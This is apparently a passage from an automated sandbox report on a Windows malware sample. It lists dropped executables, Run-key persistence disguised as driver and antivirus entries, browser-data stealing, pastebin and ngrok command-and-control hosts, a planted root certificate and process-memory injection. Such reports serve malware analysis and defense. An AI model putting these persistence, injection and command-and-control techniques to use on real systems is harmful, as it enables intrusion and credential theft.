Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\TransferRare C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\EscortsNascar C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\NavyPromising C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\HonoluluSyndrome C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\OxfordPrintable C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\ViBases C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\ImmediatelyBros C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\36.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4556 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 4556 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 4556 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 4556 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 4556 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 3824 wrote to memory of 1900 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3824 wrote to memory of 1900 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 5052 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 5052 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 5052 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 5052 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 5052 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 5052 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 1900 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 1900 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 1900 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2680 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1900 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1900 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1900 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
PID 1900 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
PID 1900 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
PID 3676 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 3676 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
